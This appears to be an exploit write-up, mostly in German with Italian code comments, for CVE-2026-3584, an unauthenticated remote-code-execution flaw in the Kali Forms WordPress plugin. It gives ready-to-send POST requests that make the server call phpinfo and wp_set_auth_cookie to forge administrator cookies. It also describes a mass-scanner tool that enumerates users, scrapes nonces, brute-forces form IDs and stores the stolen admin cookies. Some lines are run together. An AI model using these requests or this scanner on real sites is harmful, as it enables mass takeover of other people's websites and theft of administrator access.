
CVE-2026-3584
🔥 Zusammenfassung der Schwachstelle
Das WordPress-Plugin Kali Forms in Versionen <= 2.4.9 weist eine kritische Schwachstelle für nicht authentifizierte Remote-Code-Ausführung (RCE) auf. Diese Sicherheitslücke ermöglicht es nicht authentifizierten Angreifern, beliebigen PHP-Code auf dem Server auszuführen und über den öffentlich zugänglichen AJAX-Endpunkt kaliforms_form_process, der keine Autorisierungsprüfungen durchführt, vollständige Administratorrechte zu erlangen.
Die Schwachstelle liegt in der Funktion form_process, die benutzerkontrollierte Parameter (einschließlich thisPermalink und entryCounter) akzeptiert und beliebige PHP-Callbacks ausführt, was zu Folgendem führt:
phpinfo(), system(), eval() usw.wp_set_auth_cookie(), um administrative Sitzungen zu erhaltenDie Schwachstelle tritt in der Funktion form_process des Kali Forms-Plugins auf, das die AJAX-Anfragen verarbeitet. Der anfällige Code wird über Folgendes bereitgestellt:
// Endpoint AJAX accessibile senza autenticazione
add_action('wp_ajax_nopriv_kaliforms_form_process', array($this, 'form_process'));
Ablauf des Exploits:
Ungeschützter Endpunkt: Der Endpunkt /wp-admin/admin-ajax.php?action=kaliforms_form_process ist über den Hook wp_ajax_nopriv_ für nicht authentifizierte Benutzer zugänglich.
Benutzerkontrollierte Parameter:
data[thisPermalink] - kann einen beliebigen PHP-Funktionsnamen enthaltendata[entryCounter] - kann einen beliebigen PHP-Funktionsnamen enthaltendata[formId] - ID des zu verarbeitenden FormularsAusführung ungefilterter Callbacks: Der anfällige Code führt PHP-Callbacks ohne Validierung aus:
$callback = $_POST['data']['thisPermalink'];
call_user_func($callback); // Nessun controllo!
Exploit-Kette:
Attacker → POST Request → kaliforms_form_process
↓
thisPermalink=phpinfo → call_user_func('phpinfo')
↓
PHP Code Execution → phpinfo() eseguito
↓
entryCounter=wp_set_auth_cookie → Cookie amministratore generato
↓
Full Admin Access
Beispiel einer angreifbaren Anfrage:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[thisPermalink]=phpinfo&
data[email][email protected]
Ergebnis: Der Server führt phpinfo() aus und gibt vollständige Informationen zur PHP-Konfiguration zurück.
Für Privilege Escalation:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[entryCounter]=wp_set_auth_cookie&
data[email][email protected]
Ergebnis: WordPress führt wp_set_auth_cookie(user_id) aus, wobei user_id häufig formId entspricht, und erzeugt gültige Administrator-Sitzungscookies.
Das Skript mass_scanner.py implementiert eine automatisierte Pipeline in 4 Phasen zur vollständigen Ausnutzung der Schwachstelle CVE-2026-3584:
┌─────────────────────────────────────────────────────────────────â”
│ MASS SCANNER PIPELINE │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Fase 1: Ricognizione API REST │
│ ├─ Enumera utenti: /wp-json/wp/v2/users │
│ └─ Enumera post: /wp-json/wp/v2/posts │
│ → Identifica user_id e post_id per escalation │
│ │
│ Fase 2: Scoperta Moduli │
│ ├─ Crawl sito (depth=2) │
│ ├─ Cerca pattern: 'KaliFormsObject', 'kaliforms' │
│ ├─ Estrae nonce da JavaScript │
│ └─ Estrae formId da HTML │
│ → Trova tutti i moduli Kali Forms vulnerabili │
│ │
│ Fase 3: Test RCE │
│ ├─ Invia: data[thisPermalink]=phpinfo │
│ ├─ Verifica: 'PHP Version' in response │
│ └─ Salva: result/target_phpinfo.html │
│ → Conferma esecuzione codice remoto │
│ │
│ Fase 4: Escalation Privilegi │
│ ├─ Invia: data[entryCounter]=wp_set_auth_cookie │
│ ├─ Estrae: wordpress_logged_in + wordpress_sec cookies │
│ ├─ Verifica: Accesso a /wp-admin/ senza redirect │
│ └─ Salva: result_cookie/target.txt │
│ → Ottiene accesso amministratore completo │
│ │
└─────────────────────────────────────────────────────────────────┘
1. Automatische URL-Normalisierung
def normalize_url(self, target):
# Aggiunge automaticamente http:// o https://
# Prova prima HTTPS, poi fallback su HTTP
# Gestisce porte personalizzate (es. :8080)
2. REST-API-Enumeration
def enumerate_users_api(self, target):
# GET /wp-json/wp/v2/users
# Estrae tutti gli user_id disponibili
# Usato per mappare formId → user_id
def enumerate_posts_api(self, target):
# GET /wp-json/wp/v2/posts
# Estrae tutti i post_id disponibili
# Identifica sovrapposizioni user_id/post_id
3. Formularerkennung (Intelligentes Crawling)
def discover_pages(self, target, max_depth=2):
# Crawl ricorsivo del sito
# Cerca pattern JavaScript: 'KaliFormsObject'
# Filtra URL non necessari (js, css, immagini)
# Segue solo link interni
# Ritorna lista pagine con Kali Forms
4. Extrahieren von Formulardaten
def extract_form_data(self, page_url):
# Estrae nonce da JavaScript:
# KaliFormsObject = { ajax_nonce: "abc123" }
# Estrae formId da HTML:
# data-id="1" o [kaliform id="1"]
# Se nonce trovato ma no formId:
# Brute force ID 1-10